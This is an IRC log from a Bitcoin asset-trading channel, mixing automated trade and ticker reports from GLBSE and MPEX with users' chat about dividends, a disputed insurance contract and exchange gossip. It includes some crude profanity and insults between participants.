23:36:30 [GLBSE] [GIGAMINING] 1 @ 0.58 BTC [-] Sep 28 23:37:33 [GLBSE] [GIGAMINING] 1 @ 0.57 BTC [-] Sep 28 23:38:18 [MPEX] [F.GIGA.ETF] 3000 @ 0.00044037 = 1.3211 BTC [+] Sep 28 23:38:20 [MPEX] [F.GIGA.ETF] 5905 @ 0.00044037 = 2.6004 BTC [+] Sep 28 23:39:19 [GLBSE] [GOLD] 13 @ 0.00999997 = 0.13 BTC [+] Sep 28 23:39:21 [GLBSE] [GOLD] 35 @ 0.00999998 = 0.35 BTC [+] Sep 28 23:40:00 [GLBSE] [BITBOND] 1 @ 0.35 BTC [-] Sep 28 23:40:01 [GLBSE] [BITBOND] 2 @ 0.3352 = 0.6704 BTC [-] Sep 28 23:40:03 [GLBSE] [BITBOND] 1 @ 0.3351 BTC [-] Sep 28 23:40:04 [GLBSE] [BITBOND] 1 @ 0.33 BTC [-] Sep 28 23:40:05 [GLBSE] [BITBOND] 2 @ 0.3015 = 0.603 BTC [-] Sep 28 23:40:19 [GLBSE] [GIGAMINING] 3 @ 0.56000001 = 1.68 BTC [-] Sep 28 23:40:47 [GLBSE] [PLATINUM] 48 @ 0.00999999 = 0.48 BTC [+] Sep 28 23:41:53 [GLBSE] [MOORE] 3 @ 0.49200001 = 1.476 BTC [+] Sep 28 23:41:54 [GLBSE] [MOORE] 4 @ 0.492 = 1.968 BTC [-] Sep 28 23:41:54 [GLBSE] [MOORE] 1 @ 0.49 BTC [-] Sep 28 23:42:08 [GLBSE] [SILVER] 2 @ 0.00999991 = 0.02 BTC [+] Sep 28 23:42:09 [GLBSE] [SILVER] 10 @ 0.00999992 = 0.1 BTC [+] Sep 28 23:42:10 [GLBSE] [SILVER] 23 @ 0.00999997 = 0.23 BTC [+] Sep 28 23:42:11 [GLBSE] [OBSI.HRPT] 1 @ 0.0299 BTC [+] Sep 28 23:44:25 [GLBSE] [GSDPT] 255 @ 0.00336 = 0.8568 BTC [-] Sep 28 23:44:26 [GLBSE] [GSDPT] 3 @ 0.00336 = 0.0101 BTC [-] Sep 28 23:44:28 [GLBSE] [GSDPT] 1200 @ 0.0033331 = 3.9997 BTC [-] Sep 28 23:44:29 [GLBSE] [GSDPT] 300 @ 0.003333 = 0.9999 BTC [-] Sep 28 23:44:30 [GLBSE] [GSDPT] 1142 @ 0.0033 = 3.7686 BTC [-] Sep 28 23:46:21 [GLBSE] [RAREEARTH] 2 @ 0.00999999 = 0.02 BTC [+] Sep 28 23:47:39 [GLBSE] [ASICMINER] 4 @ 0.11120001 = 0.4448 BTC [-] Sep 28 23:47:41 [GLBSE] [ASICMINER] 3 @ 0.1112 = 0.3336 BTC [-] Sep 28 23:47:42 [GLBSE] [ASICMINER] 10 @ 0.1111 = 1.111 BTC [-] Sep 28 23:47:42 [GLBSE] [ASICMINER] 1 @ 0.11100002 BTC [-] Sep 28 23:47:44 [GLBSE] [ASICMINER] 3 @ 0.111 = 0.333 BTC [-] Sep 28 23:47:45 [GLBSE] [ASICMINER] 7 @ 0.1101 = 0.7707 BTC [-] Sep 28 23:47:46 [GLBSE] [ASICMINER] 1 @ 0.11000102 BTC [-] Sep 28 23:47:47 [GLBSE] [ASICMINER] 5 @ 0.11 = 0.55 BTC [-] Sep 28 23:47:48 [GLBSE] [ASICMINER] 12 @ 0.1075 = 1.29 BTC [-] Sep 28 23:47:49 [GLBSE] [ASICMINER] 11 @ 0.106 = 1.166 BTC [-] Sep 28 23:47:51 [GLBSE] [ASICMINER] 5 @ 0.1051 = 0.5255 BTC [-] Sep 28 23:47:52 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [-] Sep 28 23:47:52 [GLBSE] [ASICMINER] 25 @ 0.105 = 2.625 BTC [-] Sep 28 23:47:53 [GLBSE] [ASICMINER] 39 @ 0.1016 = 3.9624 BTC [-] Sep 28 23:47:54 [GLBSE] [ASICMINER] 10 @ 0.1015 = 1.015 BTC [-] Sep 28 23:47:55 [GLBSE] [ASICMINER] 1 @ 0.10007 BTC [-] Sep 28 23:47:56 [GLBSE] [ASICMINER] 53 @ 0.10007 = 5.3037 BTC [-] Sep 28 23:49:06 [GLBSE] [RAREEARTH] 38 @ 0.01 = 0.38 BTC [+] Sep 29 00:01:23 kakobrekla hows the forex thing coming along ? Sep 29 00:01:25 re https://bitcointalk.org/index.php?topic=113782.0 Sep 29 00:02:26 its ready mircea_popescu, http://pass:word@bit4x.com Sep 29 00:02:40 just a few finishing touches Sep 29 00:02:50 you're getting (some very funny) competition Sep 29 00:02:55 ill open for public with the start of next week Sep 29 00:03:20 [MPEX] [F.GIGA.ETF] 500 @ 0.00044037 = 0.2202 BTC [+] Sep 29 00:04:09 i dont see how he is competition? Sep 29 00:04:45 mostly quoted for the humour. Sep 29 00:09:49 [GLBSE] [GOLD] 9 @ 0.00999997 = 0.09 BTC [-] Sep 29 00:09:50 [GLBSE] [GOLD] 6 @ 0.00999998 = 0.06 BTC [+] Sep 29 00:09:52 [GLBSE] [GOLD] 249 @ 0.00999999 = 2.49 BTC [+] Sep 29 00:14:07 usagi: but he is a scam? Sep 29 00:17:09 heh Sep 29 00:18:17 [GLBSE] [PUREMINING] 1 @ 0.103 BTC [+] Sep 29 00:18:18 [GLBSE] [PUREMINING] 9 @ 0.1031 = 0.9279 BTC [+] Sep 29 00:18:20 [GLBSE] [PUREMINING] 9 @ 0.1032 = 0.9288 BTC [+] Sep 29 00:18:20 [GLBSE] [PUREMINING] 21 @ 0.1034 = 2.1714 BTC [+] Sep 29 00:21:02 [GLBSE] [FDBF] 20 @ 0.149253 = 2.9851 BTC [+] Sep 29 00:21:03 [GLBSE] [GIGAMINING] 1 @ 0.57999999 BTC [+] Sep 29 00:24:45 [GLBSE] [BIB.BVPS] 109 @ 0.00389 = 0.424 BTC [-] Sep 29 00:27:40 [GLBSE] [BBBB] 22 @ 0.00016 = 0.0035 BTC [-] Sep 29 00:27:40 !ticker btcmc Sep 29 00:27:46 [GLBSE:BTCMC] [Bid: 0.45000001] [Ask: 0.5898] [Spread: 0.13979999] [Last: 0.52998] [24hVol: ] [7dAvg: 0.50902] Sep 29 00:29:09 [MPEX] [F.GIGA.ETF] 7800 @ 0.00044037 = 3.4349 BTC [+] Sep 29 00:29:10 [MPEX] [F.GIGA.ETF] 3200 @ 0.00044037 = 1.4092 BTC [+] Sep 29 00:29:25 who owns assbot? Sep 29 00:30:45 kakobrekla Sep 29 00:38:15 [GLBSE] [NASTY] 3 @ 0.3698 = 1.1094 BTC [+] Sep 29 00:40:48 [GLBSE] [BBBB] 1 @ 0.00016 BTC [-] Sep 29 00:40:56 ;;rate Teppy 1 dev of a tale in the desert (mmorpg) Sep 29 00:40:57 Rating entry successful. Your rating of 1 for user Teppy has been recorded. Sep 29 00:42:15 [GLBSE] [DMC] 5 @ 0.05510001 = 0.2755 BTC [-] Sep 29 00:44:24 [GLBSE] [NASTY] 1 @ 0.3698 BTC [+] Sep 29 00:44:55 [GLBSE] [COGNITIVE] 1 @ 0.45500001 BTC [+] Sep 29 00:44:57 [GLBSE] [COGNITIVE] 1 @ 0.455 BTC [-] Sep 29 00:45:04 so how is life here? Sep 29 00:46:27 [GLBSE] [DMC] 6 @ 0.05520001 = 0.3312 BTC [+] Sep 29 00:46:29 [GLBSE] [DMC] 3 @ 0.0552 = 0.1656 BTC [-] Sep 29 00:47:08 PsychoticBoy quiet & peaceful Sep 29 00:47:12 piss shit cunt motherfucker. Sep 29 00:47:25 (and tits) Sep 29 00:47:26 ok thats what I wanted to hear ;) Sep 29 00:47:52 o also : you're all stars nao. https://bitcointalk.org/index.php?topic=112551.msg1229591#msg1229591 Sep 29 00:48:33 dicks fuck pussies and assholes and if the dicks didnt fuck the assholes, youll get your dick and your pussy all covert in shit Sep 29 00:48:51 enough lulz Sep 29 00:50:19 [GLBSE] [DMC] 5 @ 0.05520001 = 0.276 BTC [+] Sep 29 00:50:21 [GLBSE] [DMC] 11 @ 0.0552 = 0.6072 BTC [-] Sep 29 00:50:50 omg dmc trades ?~ Sep 29 00:51:02 who is buying Sep 29 00:53:45 jeez too much kakobrekla in that log Sep 29 00:54:10 you could just put the first and the last line in the thread Sep 29 00:54:34 [MPEX] [F.GIGA.ETF] 1100 @ 0.00044037 = 0.4844 BTC [+] Sep 29 00:55:20 [GLBSE] [PUREMINING] 3 @ 0.1032 = 0.3096 BTC [-] Sep 29 00:55:26 [GLBSE] [COGNITIVE] 3 @ 0.49000001 = 1.47 BTC [+] Sep 29 00:56:46 kakobrekla wanted to give the forum some real substance. Sep 29 00:57:15 meanwhile i've been reading usagi's cpa-bmf insurance contract from aug 1st Sep 29 00:57:22 funniest thing i read all week, Sep 29 00:57:35 how come Sep 29 00:57:43 5btc per week for 110 weeks payments ; 500 btc maximum liability. Sep 29 00:58:02 so basically... if you insured your car for 100 bucks a month, 2 years Sep 29 00:58:10 the most they would be paying would be $2000 Sep 29 00:58:22 even if you take max claim they still make money Sep 29 00:59:04 mircea_popescu: do you go outdoors sometimes? everytime I come here you are writing something, at any hour... Sep 29 00:59:17 agath i have powers. Sep 29 00:59:41 [GLBSE] [YABMC] 1 @ 0.07779999 BTC [-] Sep 29 00:59:49 mircea_popescu is omnipresent on irc Sep 29 01:00:25 usagi: don't waste time here, go to work and increase the NAV of your shares! :-) Sep 29 01:00:39 [GLBSE] [MOORE] 1 @ 0.44999999 BTC [-] Sep 29 01:01:19 :-) Sep 29 01:02:26 but anyway, atm i'm waiting for the month close on mpoe options Sep 29 01:02:38 which is ~2 hours away. Sep 29 01:02:45 i couldn't be away at a time like this. Sep 29 01:02:50 :) Sep 29 01:03:44 im always checking on irc, life comes at you fast in the bitcoin world. blink and you miss a whole tantrum. Sep 29 01:04:17 or the ever-present *POOF* coming from the latest scam Sep 29 01:04:17 [GLBSE] [MOORE] 3 @ 0.44999999 = 1.35 BTC [-] Sep 29 01:04:43 indeed. Sep 29 01:05:21 moar bitotter work this weekend! wewt! Sep 29 01:06:58 I've got data displayed, which felt awesome to get working. Sep 29 01:08:08 If CPA pays full liability, does the contract ends and no more weekly payments? Sep 29 01:08:19 About to embark on getting some working implementation of the command part, where a guy can trade with his keys. Sep 29 01:09:21 BTC-Mining lemme pull it an check Sep 29 01:09:42 (leaving aside the fact that usagi never claimed any liability in spite of bmf being entitled) Sep 29 01:10:05 4. Neither party may cancel this contract although any party may choose to Sep 29 01:10:05 accelerate their obligation at any time. Sep 29 01:10:17 that;s the extent of term limitations Sep 29 01:10:57 http://www.tsukino.ca/cpa/customers/account-12/ look for yourself, it's truely the work of a mentally retarded individual. Sep 29 01:14:51 I don't see any logical reason for that contract to exist... Sep 29 01:15:08 [GLBSE] [MOORE] 2 @ 0.44999999 = 0.9 BTC [-] Sep 29 01:15:37 oh and did anyone notice new shitstorm on btctalk? about bitcoin foundation Sep 29 01:16:16 some reactions are exceptionally moronic Sep 29 01:19:37 [MPEX] [F.GIGA.ETF] 4100 @ 0.00044037 = 1.8055 BTC [+] Sep 29 01:19:37 link? Sep 29 01:19:38 [MPEX] [F.GIGA.ETF] 1500 @ 0.00044037 = 0.6606 BTC [+] Sep 29 01:19:39 [MPEX] [F.GIGA.ETF] 1254 @ 0.00044037 = 0.5522 BTC [+] Sep 29 01:19:40 [MPEX] [F.GIGA.ETF] 746 @ 0.00044037 = 0.3285 BTC [+] Sep 29 01:20:07 https://bitcointalk.org/index.php?topic=113400.600 Sep 29 01:20:26 jurov yeah Sep 29 01:21:45 .... Sep 29 01:21:48 bitcoin price fixing Sep 29 01:21:50 I dont even Sep 29 01:21:54 https://bitcointalk.org/index.php?topic=113735.0 is condensed form Sep 29 01:21:55 I dont even know where to start to even Sep 29 01:21:58 huh ? Sep 29 01:28:32 [GLBSE] [MMM] 5 @ 0.65 = 3.25 BTC [-] Sep 29 01:29:06 [GLBSE] [MMM] 2 @ 0.65 = 1.3 BTC [-] Sep 29 01:29:17 MMM ? now that's a famous name... Sep 29 01:33:24 lol, price fixing? Who says that? Sep 29 01:39:29 [GLBSE] [BMF] 1 @ 0.51020001 BTC [-] Sep 29 01:39:31 [GLBSE] [BMF] 1 @ 0.5102 BTC [-] Sep 29 01:40:06 its in the thread jurov linked to Sep 29 01:40:57 I think he does care. This whole exercise of borrowing shares is to be able to write CALL options without being naked, right? << ahaha sgornick Sep 29 01:41:20 this is french humour. like a savarine, all delicate and flavourfull. Sep 29 01:42:07 Is that the right reason though? To offer options? Sep 29 01:42:15 nah, im just selling the stuff. Sep 29 01:42:21 what I said before, about contract 12 of usagi, how on fucking earth can someone insure himself?? one of the two companies is the losing one in the contract Sep 29 01:42:58 yes but one owner, with 1 intrest, making money Sep 29 01:43:00 PsychoticBoy in practical terms it just seems a loan from cpa to bmf. bmf gets a total 500 btc in 5 lump payments Sep 29 01:43:06 and cpa gets 5 btc a week for 2 years Sep 29 01:43:29 Ok then its no insurance, only an insured loan Sep 29 01:43:36 the interest for the 2 years is < 10% tho, which is ridiculous Sep 29 01:44:05 so on this end cpa investors are being fleeced to pay bmf investors. Sep 29 01:44:07 I am not complaining, got LUCKLY nothing to do with that Sep 29 01:44:17 on the other end, usagi hasn't claimed the insurance tho the nav allows it Sep 29 01:44:31 so in this respect bmf investors are being fleeced for the benefit of cpa investors Sep 29 01:44:53 just the fact that one ownes both companies so one of the 2 will lose Sep 29 01:44:54 in short, it's a stupid mess resulting mostly from the fact usagi doesn't have the intellectual werewithal to understand the implications of it all. Sep 29 01:45:00 [MPEX] [S.MPOE] 6200 @ 0.00036669 = 2.2735 BTC [-] Sep 29 01:45:54 ok but it doesnt make sense to loan one money when the big pot is your own wallet Sep 29 01:46:40 but this speculation will make things worse Sep 29 01:47:04 so just dont give ppl reason to speculate Sep 29 01:47:55 hope investors will think so too Sep 29 01:50:41 usagi, if they don't vote, that counts as yes or no? Sep 29 01:56:26 [GLBSE] [CPA] 1 @ 0.04797 BTC [-] Sep 29 01:57:29 [GLBSE] [BMF] 1 @ 0.51020001 BTC [+] Sep 29 01:57:30 [GLBSE] [BMF] 1 @ 0.5102 BTC [-] Sep 29 02:05:37 any outlandish news today? Sep 29 02:06:23 pirate paid. Sep 29 02:06:45 his cocktail at pirate island Sep 29 02:07:23 mircea_popescu: bull shit Sep 29 02:07:23 :p Sep 29 02:07:35 aww! why nobody believes me! Sep 29 02:07:47 heh Sep 29 02:10:17 [MPEX] [S.MPOE] 26300 @ 0.00036506 = 9.6011 BTC [-] Sep 29 02:10:18 [MPEX] [S.MPOE] 15100 @ 0.00036443 = 5.5029 BTC [-] Sep 29 02:15:21 the market no likey your lie mp Sep 29 02:15:47 s/lie/joke/ Sep 29 02:16:24 [GLBSE] [DMC] 3 @ 0.05520001 = 0.1656 BTC [+] Sep 29 02:16:25 [GLBSE] [DMC] 86 @ 0.0552 = 4.7472 BTC [-] Sep 29 02:16:26 [GLBSE] [DMC] 11 @ 0.0551 = 0.6061 BTC [-] Sep 29 02:17:24 it was all diablo's fault Sep 29 02:35:10 [GLBSE] [NYAN.A] 1 @ 0.999999 BTC [+] Sep 29 02:35:28 [MPEX] [S.MPOE] 8300 @ 0.00036443 = 3.0248 BTC [-] Sep 29 02:35:30 [MPEX] [S.MPOE] 36700 @ 0.00036394 = 13.3566 BTC [-] Sep 29 02:35:31 [MPEX] [S.MPOE] 9400 @ 0.00036359 = 3.4177 BTC [-] Sep 29 02:37:18 [GLBSE] [NASTY] 1 @ 0.3698 BTC [+] Sep 29 02:40:28 ;;bc,24hprc Sep 29 02:40:31 12.30 Sep 29 02:41:34 nanotube: out of curiosity, is that number cached at all? (by you, or by them to you knowledge) Sep 29 02:43:19 smickles iirc btccharts was doing ~1 minute averages Sep 29 02:43:46 after mpoe started relying on it the owner improved the algo significantly sometime last year. Sep 29 02:44:02 ah, nifty Sep 29 02:49:50 Forum down for anyone else? Sep 29 02:51:47 ;;isitdown bitcointalk.org Sep 29 02:51:50 Luceo: yup Sep 29 02:51:53 http://bitcointalk.org Is Down -> Check if your website is up or down? Sep 29 02:52:13 .isdown bitcointalk.org Sep 29 02:52:27 ty sgornick Sep 29 02:52:32 Not completely down .. really slow. like really slow, and browser will timeout for some Sep 29 03:00:36 ;;bc,24hprc Sep 29 03:00:38 12.30 Sep 29 03:00:49 [MPEX] [S.MPOE] 10500 @ 0.00036573 = 3.8402 BTC [+] Sep 29 03:08:53 [GLBSE] [BBBB] 200 @ 0.00016 = 0.032 BTC [-] Sep 29 03:21:36 18:46] Not with people on you for "losing 50% in 3 months" jesus christ Sep 29 03:21:54 Why is that in quotes, BMF indeed lost 50% in 3 months =/ Sep 29 03:25:46 [GLBSE] [OBSI.HRPT] 200 @ 0.0299 = 5.98 BTC [+] Sep 29 03:29:07 [MPEX] [S.MPOE] 51400 @ 0.00036573 = 18.7985 BTC [+] Sep 29 03:30:09 [GLBSE] [BMF] 1 @ 0.5102 BTC [-] Sep 29 03:31:22 [GLBSE] [BMF] 5 @ 0.51 = 2.55 BTC [-] Sep 29 03:31:50 [GLBSE] [BMF] 1 @ 0.5102 BTC [+] Sep 29 03:35:10 [GLBSE] [BFLS.RIG] 7 @ 0.55 = 3.85 BTC [+] Sep 29 03:35:27 [GLBSE] [BMF] 1 @ 0.5 BTC [-] Sep 29 03:36:03 [GLBSE] [BFLS.RIG] 1 @ 0.55 BTC [+] Sep 29 03:38:12 [GLBSE] [BMF] 2 @ 0.4952 = 0.9904 BTC [-] Sep 29 03:38:28 [GLBSE] [BMF] 2 @ 0.495 = 0.99 BTC [-] Sep 29 03:38:45 [GLBSE] [BFLS.RIG] 2 @ 0.55 = 1.1 BTC [+] Sep 29 03:41:38 Azelphur: the famous 400gbp loan was you? Sep 29 03:41:52 copumpkin: it's famous? I loaned nef 400 gbp yea Sep 29 03:42:03 dub was making a lot of noise about it yesterday :) Sep 29 03:42:12 o.O why? Sep 29 03:43:28 [GLBSE] [OBSI.HRPT] 63 @ 0.0299 = 1.8837 BTC [+] Sep 29 03:43:30 [GLBSE] [OBSI.HRPT] 92 @ 0.03 = 2.76 BTC [+] Sep 29 03:43:31 [GLBSE] [OBSI.HRPT] 137 @ 0.04 = 5.48 BTC [+] Sep 29 03:43:32 [GLBSE] [OBSI.HRPT] 1 @ 0.04461428 BTC [+] Sep 29 03:43:34 [GLBSE] [OBSI.HRPT] 18 @ 0.04743998 = 0.8539 BTC [+] Sep 29 03:43:35 [GLBSE] [OBSI.HRPT] 90 @ 0.049 = 4.41 BTC [+] Sep 29 03:43:36 [GLBSE] [OBSI.HRPT] 296 @ 0.049 = 14.504 BTC [+] Sep 29 03:43:37 [GLBSE] [OBSI.HRPT] 200 @ 0.05 = 10 BTC [+] Sep 29 03:43:37 [GLBSE] [OBSI.HRPT] 33 @ 0.05 = 1.65 BTC [+] Sep 29 03:43:38 [GLBSE] [OBSI.HRPT] 8 @ 0.05 = 0.4 BTC [+] Sep 29 03:43:40 [GLBSE] [OBSI.HRPT] 62 @ 0.05 = 3.1 BTC [+] Sep 29 03:54:18 [MPEX] [S.MPOE] 600 @ 0.00036573 = 0.2194 BTC [+] Sep 29 03:54:19 [MPEX] [S.MPOE] 6400 @ 0.00036407 = 2.33 BTC [-] Sep 29 04:00:12 [GLBSE] [BBBB] 169 @ 0.00016 = 0.027 BTC [-] Sep 29 04:05:57 Azelphur Sep 29 04:06:19 Bazelphur Sep 29 04:06:39 Because somehow GLBSE's owner needing 400 GPB was very, VERY bad Sep 29 04:06:54 Well at least the dev, there's some other owners too Sep 29 04:06:56 oh shit, what? Sep 29 04:07:39 Nef was short 400 GPB to prepare the conference Sep 29 04:08:14 so, um, isn't it only bad if he has a hard time paying back? Sep 29 04:08:51 I would say so too Sep 29 04:10:19 Azelphur i'd like an autograph now that you are famous Sep 29 04:10:41 o.O Sep 29 04:10:58 he told me he was just waiting for some withdraw and couldn't be assed Sep 29 04:11:14 blah blah celebrity Sep 29 04:11:31 woo celebrity xD Sep 29 04:15:55 I want to be famous. Where do I have to put the money? Sep 29 04:15:59 xD Sep 29 04:18:19 rdponticelli_, You can: Sep 29 04:18:25 1. scam people Sep 29 04:18:35 2. Loan money to someone people hate Sep 29 04:18:53 people hate nefario? Sep 29 04:18:53 Insta-popularity Sep 29 04:18:57 You mean I can be the next pirate? Sep 29 04:18:58 Some do Sep 29 04:19:02 I dont Sep 29 04:19:09 I just think hes in over his head Sep 29 04:19:24 he needs to quit fighting the whole BitSEC thing Sep 29 04:19:53 I believe he's not planning enough and considering the weight of his actions. Sep 29 04:20:10 He could have managed some situations better. Sep 29 04:20:23 Actually I think the same about you Diablo-D3 Sep 29 04:20:29 for DMC. Sep 29 04:20:47 I think I respect both of you more as programmers than anything else. Sep 29 04:20:59 well, I gave people some of what they wanted. Sep 29 04:21:08 I bought back over 9000 shares Sep 29 04:21:09 [18:20] He could have managed some situations better. AGREED Sep 29 04:21:13 I want to see some nice datacenter Sep 29 04:21:14 I think almost everybody got overwhelmed Sep 29 04:21:24 BTC-Mining: so do I Sep 29 04:23:08 [MPEX] [S.MPOE] 4700 @ 0.00036407 = 1.7111 BTC [-] Sep 29 04:23:17 Things are growing too much, too fast. A lot of people thought they would be up to it, but they wasn't Sep 29 04:23:39 For chaang, although I believe chaang was a bit looking for it, his removal was too expedited. It should have allowed at least a good delay warning for goat and the investors so goat could prepare managing his TYGRR offers without GLBSE. Sep 29 04:23:59 [GLBSE] [NASTY] 1 @ 0.3698 BTC [+] Sep 29 04:24:23 Reasonable delays would have made the situation much more acceptable. Sep 29 04:25:11 Indeed, all the transitions could have been managed a lot better Sep 29 04:30:41 [GLBSE] [MOORE] 5 @ 0.41999999 = 2.1 BTC [-] Sep 29 04:32:50 [GLBSE] [BBBB] 500 @ 0.00016 = 0.08 BTC [-] Sep 29 04:35:19 [GLBSE] [MOORE] 1 @ 0.48000001 BTC [+] Sep 29 04:38:50 [GLBSE] [MOORE] 2 @ 0.48000001 = 0.96 BTC [+] Sep 29 04:40:31 [GLBSE] [MOORE] 1 @ 0.48000001 BTC [+] Sep 29 04:41:04 [GLBSE] [RSM] 2 @ 0.29 = 0.58 BTC [+] Sep 29 04:42:21 [GLBSE] [MOORE] 3 @ 0.48000001 = 1.44 BTC [+] Sep 29 04:45:52 [GLBSE] [MOORE] 3 @ 0.48000001 = 1.44 BTC [+] Sep 29 04:48:43 [MPEX] [S.MPOE] 40500 @ 0.00036407 = 14.7448 BTC [-] Sep 29 04:48:45 [MPEX] [S.MPOE] [PAID] 500000000 @ = 2 BTC Sep 29 04:49:28 umm kakobrekla seems the assbot is borkt ? Sep 29 04:49:57 lol Sep 29 04:49:59 http://trilema.com/2012/mpoe-rezultate-septembrie-2012/ mpoe sept reports Sep 29 04:50:28 S.MPOE paid a total dividend of 2`142.90254453 BTC to 500`000`000 outstanding shares (as per twitter) Sep 29 04:50:46 at least the float is right Sep 29 04:50:54 :p Sep 29 04:51:34 ill fix it later Sep 29 04:53:14 it's odd cause i recall it used to werk Sep 29 04:55:19 [GLBSE] [BFLS] 1 @ 0.49999999 BTC [+] Sep 29 04:56:00 How is MPOE doing this month/ Sep 29 04:56:01 ? Sep 29 04:56:07 ^^ Sep 29 04:56:34 o Sep 29 04:56:35 duh Sep 29 04:56:57 very nice Sep 29 04:58:39 best month so far Sep 29 04:58:41 my MPOE hoarding paying off BIGTIME Sep 29 04:58:47 course, i say that every other month Sep 29 04:59:10 makes up for last month butt hurt Sep 29 04:59:16 jus about Sep 29 04:59:17 Last one was the best of the worsts Sep 29 04:59:20 haha yep Sep 29 04:59:25 by a very wide berth Sep 29 04:59:41 when is the bond submission deadline? Sep 29 04:59:51 might throw down a few coins on it Sep 29 05:00:19 bug 48 hours Sep 29 05:00:33 can I send from MPEx balance Sep 29 05:00:40 or alternatively you can buy the mpcd series, which are half there Sep 29 05:00:41 or only from another wallet Sep 29 05:00:51 I have MPCD Sep 29 05:00:57 yeah I like those more Sep 29 05:00:59 [GLBSE] [SS] 1 @ 0.01155001 BTC [-] Sep 29 05:01:00 [GLBSE] [SS] 100 @ 0.01155 = 1.155 BTC [-] Sep 29 05:01:08 I like 2-3% Sep 29 05:01:10 you have to send from wallet, email first, it's a production Sep 29 05:01:27 mostly worth it if you're doing k's+ Sep 29 05:01:38 I'm more comfortable with the A tranche Sep 29 05:02:11 a is pretty safe i think Sep 29 05:02:24 NYAN.A on the other hand... Sep 29 05:02:37 lol Sep 29 05:02:48 yeah. that may turn as a loss Sep 29 05:02:55 It's just that in times of crisis... the uncorrelated assets turn correlated Sep 29 05:03:01 harnett isn't doing so well but i'm still thinking he'll pull through Sep 29 05:03:03 That's why it never have asks... Sep 29 05:03:05 mircea_popescu i think it has to do with your strange standard for expressing numbers Sep 29 05:03:14 kakobrekla the ` got him ? Sep 29 05:03:19 dunno Sep 29 05:03:25 i'll see when i'll see Sep 29 05:03:34 it iddn't hurt it on the 500`000`000 tho Sep 29 05:04:30 hey! That's actually over 1% dividend Sep 29 05:04:35 not bad Sep 29 05:04:47 yeah Sep 29 05:04:52 course shares lost like 15% Sep 29 05:05:07 from where? Sep 29 05:05:14 42000? Sep 29 05:05:15 depends how you look at it, on the long term (in btc 6 months is a long term) it made like 250% Sep 29 05:05:20 Bugpowder from max yea Sep 29 05:05:46 I don't know the long term history Sep 29 05:06:16 well, in short : in april and may i did two share blocks of 100 and 400k shares which were allocated on subscription basis Sep 29 05:06:28 It's actually going to outperform S.DICE this month Sep 29 05:06:30 ie, all interested ppl sent money, then the block was split according to proportion of total Sep 29 05:06:32 KEWL Sep 29 05:06:46 and after that it was listed, at ~9k satoshi per share Sep 29 05:06:51 and it kinda went from there Sep 29 05:06:57 right on Sep 29 05:07:13 well, hopefully it goes up Sep 29 05:07:16 : Sep 29 05:07:29 i find it disturbing and mostly incredible that shares are being discussed in -assets Sep 29 05:07:31 cause I have maybe too many shares Sep 29 05:07:36 something is badly wwwrong. Sep 29 05:07:40 mircea_popescu: SCAMM0R Sep 29 05:07:44 my bad Sep 29 05:07:47 mircea_popescu: WHY DO YOU NMURDER BABIES? Sep 29 05:07:48 its the new guy Sep 29 05:07:59 shuddup copedopkin Sep 29 05:08:33 you are sockpuppet of nefario. Sep 29 05:09:46 fuck Sep 29 05:09:48 how did you know? Sep 29 05:10:24 my pet shenanigan told me. Sep 29 05:11:22 o actually... mpcd made a little mroe than projected this month Sep 29 05:11:28 like .5 btc or something Sep 29 05:11:53 [MPEX] [S.BVPS] 7500 @ 0.00349799 = 26.2349 BTC [+] Sep 29 05:11:55 [MPEX] [S.BVPS] 3500 @ 0.00350099 = 12.2535 BTC [+] Sep 29 05:11:56 [MPEX] [S.BVPS] 250 @ 0.00351377 = 0.8784 BTC [+] Sep 29 05:11:57 [MPEX] [S.BVPS] 5000 @ 0.00352001 = 17.6001 BTC [+] Sep 29 05:11:59 [MPEX] [S.BVPS] 7000 @ 0.00353422 = 24.7395 BTC [+] Sep 29 05:14:40 [GLBSE] [MOORE] 1 @ 0.42 BTC [-] Sep 29 05:15:26 [GLBSE] [DMC] 3 @ 0.05510001 = 0.1653 BTC [+] Sep 29 05:16:42 [GLBSE] [COGNITIVE] 1 @ 0.51877992 BTC [+] Sep 29 05:18:03 [GLBSE] [FDBF] 1 @ 0.149253 BTC [+] Sep 29 05:19:56 [GLBSE] [FDBF] 1 @ 0.149253 BTC [+] Sep 29 05:22:51 [GLBSE] [BTCMC] 1 @ 0.5898 BTC [+] Sep 29 05:26:21 [GLBSE] [CPA] 5 @ 0.0465 = 0.2325 BTC [-] Sep 29 05:27:05 [GLBSE] [GSDPT] 1000 @ 0.00339995 = 3.4 BTC [+] Sep 29 05:28:04 [GLBSE] [COGNITIVE] 1 @ 0.45999999 BTC [-] Sep 29 05:31:39 [GLBSE] [COGNITIVE] 1 @ 0.48000001 BTC [+] Sep 29 05:33:39 [GLBSE] [COGNITIVE] 1 @ 0.4999 BTC [+] Sep 29 05:34:23 [GLBSE] [SILVER] 5 @ 0.00911011 = 0.0456 BTC [-] Sep 29 05:34:37 [GLBSE] [MOORE] 1 @ 0.43 BTC [+] Sep 29 05:34:59 [GLBSE] [COGNITIVE] 1 @ 0.46 BTC [-] Sep 29 05:35:46 ;;ticker S.BVPS Sep 29 05:35:46 (ticker [--bid|--ask|--last|--high|--low]) -- Return pretty-printed mtgox ticker. If one of the options is given, returns only that numeric result (useful for nesting in calculations). Sep 29 05:36:06 !ticker s.bvps Sep 29 05:36:08 [MPEX:S.BVPS] 1day: 0.00349799 / 0.00351425 / 0.00353422 (23250 shares, 81.71 BTC), 30day: 0.001175 / 0.00342705 / 0.003801 (54659 shares, 187.32 BTC) Sep 29 05:36:12 tx Sep 29 05:37:07 [MPEX] [F.GIGA.ETF] 2370 @ 0.00044037 = 1.0437 BTC [+] Sep 29 05:37:08 [MPEX] [F.GIGA.ETF] 1130 @ 0.00044037 = 0.4976 BTC [+] Sep 29 05:37:10 [MPEX] [S.MPOE] 1652 @ 0.00036407 = 0.6014 BTC [-] Sep 29 05:37:11 [MPEX] [S.MPOE] 65 @ 0.00036359 = 0.0236 BTC [-] Sep 29 05:37:53 !ticker GIGAMINING Sep 29 05:37:57 [GLBSE:GIGAMINING] [Bid: 0.56000001] [Ask: 0.57999999] [Spread: 0.01999998] [Last: 0.57999999] [24hVol: 60.58699992] [7dAvg: 0.61576437] Sep 29 05:38:08 [GLBSE] [RAREEARTH] 1 @ 0.00999999 BTC [-] Sep 29 05:39:09 !ticker S.MPOE Sep 29 05:39:10 [MPEX:S.MPOE] 1day: 0.00036136 / 0.00036503 / 0.00037073 (1067144 shares, 389.54 BTC), 30day: 0.00034 / 0.00039473 / 0.00042 (58545008 shares, 23,109.79 BTC) Sep 29 05:41:44 [GLBSE] [SYNERGY] 1 @ 0.14499997 BTC 